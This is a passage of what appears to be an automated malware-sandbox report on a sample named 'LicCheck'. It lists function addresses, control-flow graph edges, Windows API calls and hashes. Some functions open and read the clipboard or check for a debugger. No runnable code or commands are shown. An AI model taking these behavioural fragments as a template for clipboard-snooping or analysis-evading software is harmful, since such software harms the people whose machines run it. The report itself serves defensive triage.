                                                                                                    control_flow_graph 726 795500-79551d 727 79551f 726->727 728 795532-795536 726->728 729 795521-795523 727->729 730 795525-79552f 727->730 731 79553c-795540 728->731 732 7955f2-7955fe 728->732 729->728 729->730 735 795544-795555 call 7976e0 731->735 733 795600-795606 732->733 734 795636-79563a 732->734 733->734 736 795608-795633 call 7a6990 733->736 737 79563c-795644 734->737 738 7956a7-7956b8 734->738 744 79559e-7955ac 735->744 745 795557 735->745 736->734 741 79565c-795666 737->741 742 795646-79565a 737->742 747 795668 741->747 748 795692-795694 741->748 742->741 762 7955db-7955ef 744->762 763 7955ae-7955bc 744->763 750 795559-79555b 745->750 751 79555d-795563 745->751 752 795670-79567b call 7ad786 747->752 748->738 749 795696-7956a5 call 7ad786 748->749 749->738 750->744 750->751 754 795575-79559c call 7a6990 751->754 755 795565-795569 751->755 764 795680-79568c 752->764 766 7955bf-7955cb 754->766 759 79556b-79556d 755->759 760 79556f-795571 755->760 759->754 759->760 760->754 763->766 764->738 767 79568e-795690 764->767 766->735 768 7955d1 766->768 767->748 767->752 768->762 769 7955d3-7955d5 768->769 769->735 769->762
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: 4b087596cc9eb98050c8b4b78452140b153cfb16718e517398dc735e6d38b272
                                                                                                    • Instruction ID: af619c8259f6df4ab921a401c37c13bf5e49c7d353da8a0b73c1d18c4012f2f9
                                                                                                    • Opcode Fuzzy Hash: 4b087596cc9eb98050c8b4b78452140b153cfb16718e517398dc735e6d38b272
                                                                                                    • Instruction Fuzzy Hash: 31518D726046118FCB19CF2CE884A6A77E2EFC4720F158669F858CB356E735DC15CB91
                                                                                                    Function 007B3705 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 770 7b3705-7b370e 771 7b373d-7b373e 770->771 772 7b3710-7b3723 RtlFreeHeap 770->772 772->771 773 7b3725-7b373c GetLastError call 7ae756 call 7ae7f3 772->773 773->771
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,007BBE7D,00000000,00000000,00000000,?,007BC11E,00000000,00000007,00000000,?,007BC617,00000000,00000000), ref: 007B371B
                                                                                                    • GetLastError.KERNEL32(00000000,?,007BBE7D,00000000,00000000,00000000,?,007BC11E,00000000,00000007,00000000,?,007BC617,00000000,00000000), ref: 007B3726
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: 8864ec48e10cb1461400fdb170a6fd58fe7d41c7e191a9a973acafd1d6c14bfb
                                                                                                    • Instruction ID: f52c340b28d08b530e4bd1715fbc1bc316b524a3fca3ab23b168d18d91f39c9a
                                                                                                    • Opcode Fuzzy Hash: 8864ec48e10cb1461400fdb170a6fd58fe7d41c7e191a9a973acafd1d6c14bfb
                                                                                                    • Instruction Fuzzy Hash: E6E08CB2500A14ABCB212BA4AC8CFC93B68AB41391F108024F60C9A160DB7D99C5C798
                                                                                                    Function 007B38A3 Relevance: 2.6, APIs: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 778 7b38a3-7b38b7 call 7bb6b6 781 7b38b9-7b38bb 778->781 782 7b38bd-7b38c5 778->782 783 7b390b-7b392b call 7bb625 781->783 784 7b38d0-7b38d3 782->784 785 7b38c7-7b38ce 782->785 794 7b393d 783->794 795 7b392d-7b393b call 7ae7bc 783->795 788 7b38f1-7b3901 call 7bb6b6 CloseHandle 784->788 789 7b38d5-7b38d9 784->789 785->784 787 7b38db-7b38ef call 7bb6b6 * 2 785->787 787->781 787->788 788->781 797 7b3903-7b3909 GetLastError 788->797 789->787 789->788 799 7b393f-7b3942 794->799 795->799 797->783
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,007B378A,00000000,CF830579,007D4260,0000000C,007B3846,007AA44C,?), ref: 007B38F9
                                                                                                    • GetLastError.KERNEL32(?,007B378A,00000000,CF830579,007D4260,0000000C,007B3846,007AA44C,?), ref: 007B3903
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 918212764-0
                                                                                                    • Opcode ID: 231388546dd74582c68fe0810def08232b908ec31ffb160b9b30e1daaf073acb
                                                                                                    • Instruction ID: a7253cff9074a5e9406976ab4b23a7d6f70acccc7fb140a7d346a0dba39d2219
                                                                                                    • Opcode Fuzzy Hash: 231388546dd74582c68fe0810def08232b908ec31ffb160b9b30e1daaf073acb
                                                                                                    • Instruction Fuzzy Hash: 6E11483360012056D6355234988ABFD67658F92738F25021DFC158B2D2EFADDDC583A6
                                                                                                    Function 007B7BAF Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 803 7b7baf-7b7bd5 call 7b7985 806 7b7c2e-7b7c31 803->806 807 7b7bd7-7b7be9 call 7c04b7 803->807 809 7b7bee-7b7bf3 807->809 809->806 810 7b7bf5-7b7c2d 809->810
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: a53bd4e7f6ea78b11f5f1706a4b4985137a276a876f2576f09a176fbf79db0f1
                                                                                                    • Instruction ID: 84fb404a5d93aedf8bb1781d59293934167523897265b2eaa79d1bff626f82de
                                                                                                    • Opcode Fuzzy Hash: a53bd4e7f6ea78b11f5f1706a4b4985137a276a876f2576f09a176fbf79db0f1
                                                                                                    • Instruction Fuzzy Hash: 56111575A0420AAFCB09DF58E945ADB7BF9EF48304F144069F809AB251D635EA11CBA4
                                                                                                    Function 007B2A9C Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 811 7b2a9c-7b2aa7 812 7b2aa9-7b2ab3 811->812 813 7b2ab5-7b2abb 811->813 812->813 814 7b2ae9-7b2af4 call 7ae7f3 812->814 815 7b2abd-7b2abe 813->815 816 7b2ad4-7b2ae5 RtlAllocateHeap 813->816 822 7b2af6-7b2af8 814->822 815->816 818 7b2ac0-7b2ac7 call 7b18fa 816->818 819 7b2ae7 816->819 818->814 824 7b2ac9-7b2ad2 call 7b1945 818->824 819->822 824->814 824->816
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,007B24DE,00000001,00000364,?,00000006,000000FF,?,007A63FB,?,?,?,?), ref: 007B2ADD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 92dfd1f5c2ff768c7b8273adf43d5aacee3723b62db1c27093308ea03bfb0ed9
                                                                                                    • Instruction ID: 50a9da1aca12a8942cc3b591c9b7b9abecde9f987ab1a8a0e46ea0c91a0bb07c
                                                                                                    • Opcode Fuzzy Hash: 92dfd1f5c2ff768c7b8273adf43d5aacee3723b62db1c27093308ea03bfb0ed9
                                                                                                    • Instruction Fuzzy Hash: 72F0E931606625B7DB316B629C09BDB3758AF417B0B24C112BC04E6192DB6CDC0386E0
                                                                                                    Function 007B3AE9 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,007A63FB,?,?,?,?,?,00792EE7,?,?,?), ref: 007B3B1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 139683240b1dbfc4eaed261be8e548605dbb7615aeea9f9ff2fa4d4f01a55a33
                                                                                                    • Instruction ID: 48ea9ba6707fd03d5bed6a3705655e28f780e37da585c738bfe06e7855320c96
                                                                                                    • Opcode Fuzzy Hash: 139683240b1dbfc4eaed261be8e548605dbb7615aeea9f9ff2fa4d4f01a55a33
                                                                                                    • Instruction Fuzzy Hash: 7DE02B7520166197DB3027655C05FDB3B4CDF423B0F140221BC44960C5DB6CDD8185E4
                                                                                                    Function 007C0190 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,00000000,?,007C0580,?,?,00000000,?,007C0580,?,0000000C), ref: 007C01AD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 4af8a486e48e6f5f9182f3664cebd43e4ea71a50fbf5723cb5d9358bf2946e6a
                                                                                                    • Instruction ID: 0639f56a29675a1f668ec96442e927648b5c2c8fb600b744f379e8933beb0252
                                                                                                    • Opcode Fuzzy Hash: 4af8a486e48e6f5f9182f3664cebd43e4ea71a50fbf5723cb5d9358bf2946e6a
                                                                                                    • Instruction Fuzzy Hash: 37D06C3214010DBBDF028F84DC06EDA3BAAFB48714F058100BE1896020C736E861AB94
                                                                                                    Function 00793C80 Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(DEADBEEF,61DA755C), ref: 00793CBF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: ddf27fec875f1b8bac3d48255aba8858e910211f3b702d9c092767684e675de6
                                                                                                    • Instruction ID: 1e547bb536edf9e296e04bfd46ab012bf9c0de0e70f09742fcfce74b789207b4
                                                                                                    • Opcode Fuzzy Hash: ddf27fec875f1b8bac3d48255aba8858e910211f3b702d9c092767684e675de6
                                                                                                    • Instruction Fuzzy Hash: 33F0B4B2944B08AFC710CFA9DD41F9ABBB8FB05721F10422AE41593680D739250586A4

                                                                                                    Non-executed Functions

                                                                                                    Function 00792B90 Relevance: 18.1, APIs: 12, Instructions: 91clipboardmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Close$AllocEmptyGlobalOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4230510986-0
                                                                                                    • Opcode ID: 06d42b0cc6924884ad1afbee0c8f4d72787d68b07ae05bd1099c4b0edf843c0c
                                                                                                    • Instruction ID: 4b0b190d69a0af1a1bfab13ea21fc89f162060f2a9141295f422114706a09163
                                                                                                    • Opcode Fuzzy Hash: 06d42b0cc6924884ad1afbee0c8f4d72787d68b07ae05bd1099c4b0edf843c0c
                                                                                                    • Instruction Fuzzy Hash: 5E21C131204908BBDB157F35BC8CE6E3769EF53751B088108F946C2142EB2DE88286B9
                                                                                                    Function 00792C80 Relevance: 10.6, APIs: 7, Instructions: 149clipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32(00000000), ref: 00792CB4
                                                                                                    • GetClipboardData.USER32(00000001), ref: 00792CC0
                                                                                                    • CloseClipboard.USER32 ref: 00792CCC
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00792CFA
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00792D3F
                                                                                                    • CloseClipboard.USER32 ref: 00792D49
                                                                                                    • CloseClipboard.USER32 ref: 00792DAB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Close$Global$DataLockOpenUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3729548305-0
                                                                                                    • Opcode ID: 74a313afd76fd353906ef31fdc43562e2d9276adbe50da1457ae84c94fcf2ddc
                                                                                                    • Instruction ID: d332e4331265f75e7a7b5e9f0a0415cd51a3e337f3d388390b68dd84e33655a2
                                                                                                    • Opcode Fuzzy Hash: 74a313afd76fd353906ef31fdc43562e2d9276adbe50da1457ae84c94fcf2ddc
                                                                                                    • Instruction Fuzzy Hash: 93413770E10604ABDF14EF34E848BAEB7B1EF85710F24870DF445A7682EB7865C28B94
                                                                                                    Function 007BD628 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,007BD946,00000002,00000000,?,?,?,007BD946,?,00000000), ref: 007BD6C1
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,007BD946,00000002,00000000,?,?,?,007BD946,?,00000000), ref: 007BD6EA
                                                                                                    • GetACP.KERNEL32(?,?,007BD946,?,00000000), ref: 007BD6FF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 2299586839-711371036
                                                                                                    • Opcode ID: f6ca9c87b57f100440091d8e86388836dca07e5bf8e12bf79410fff8349da841
                                                                                                    • Instruction ID: 057323de253e0e1f28a73c4e469d76b62486214dc327a44d00f2ae82f1b91320
                                                                                                    • Opcode Fuzzy Hash: f6ca9c87b57f100440091d8e86388836dca07e5bf8e12bf79410fff8349da841
                                                                                                    • Instruction Fuzzy Hash: E521BEB2A00108ABEB349F54D904BD777A6EB50BA8B5A8028E90EDB100FB3ADD40C350
                                                                                                    Function 007BD7FD Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 007BD909
                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 007BD952
                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 007BD961
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 007BD9A9
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 007BD9C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 415426439-0
                                                                                                    • Opcode ID: 09624af69af1865c9909e1208c01e9bf63be286942a97b8f41a9e224cbff5dd4
                                                                                                    • Instruction ID: 83b21aaf2220538f9b1f2bce0beeed44bc99c6d80396da41fa48600bc78f20ff
                                                                                                    • Opcode Fuzzy Hash: 09624af69af1865c9909e1208c01e9bf63be286942a97b8f41a9e224cbff5dd4
                                                                                                    • Instruction Fuzzy Hash: 48517D72A00609AFDB20DFA5DC45FEA77B8EF08700F184529E905E7191FB78AE40CB61
                                                                                                    Function 007BCE99 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
                                                                                                      • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,007B098E,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007BCF5A
                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,007B098E,?,?,?,00000055,?,-00000050,?,?), ref: 007BCF85
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007BD0E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                    • String ID: utf8
                                                                                                    • API String ID: 607553120-905460609
                                                                                                    • Opcode ID: 65b0b5eaafb9d7f7b19bc4860683edf0bb347bef8e2129bca4db67a5a4670e28
                                                                                                    • Instruction ID: cadda06e28795406c9693bbb3becbadfdb0a6b8e9eab7e7704b00c851d7db7b3
                                                                                                    • Opcode Fuzzy Hash: 65b0b5eaafb9d7f7b19bc4860683edf0bb347bef8e2129bca4db67a5a4670e28
                                                                                                    • Instruction Fuzzy Hash: 6971B272600606EBEB35AB74CC4AFFA73A9EF44700F14846AF505DB181FA7DED418664
                                                                                                    Function 007B3CF8 Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 3213747228-0
                                                                                                    • Opcode ID: e030b2298e0d9f9cb91cf1a70554882ac09d070c00e7bb26036b4e9e32c17164
                                                                                                    • Instruction ID: 14b531a78153b30328c98b66602c2742de3a37de0c6289c94c44bc120fd5e52d
                                                                                                    • Opcode Fuzzy Hash: e030b2298e0d9f9cb91cf1a70554882ac09d070c00e7bb26036b4e9e32c17164
                                                                                                    • Instruction Fuzzy Hash: 36B13832E042559FDB158F68C881BFEBBB5EF59310F14416AE905EB242D63DDE81CBA0
                                                                                                    Function 007A5B6A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007A5B76
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 007A5C42
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007A5C62
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 007A5C6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
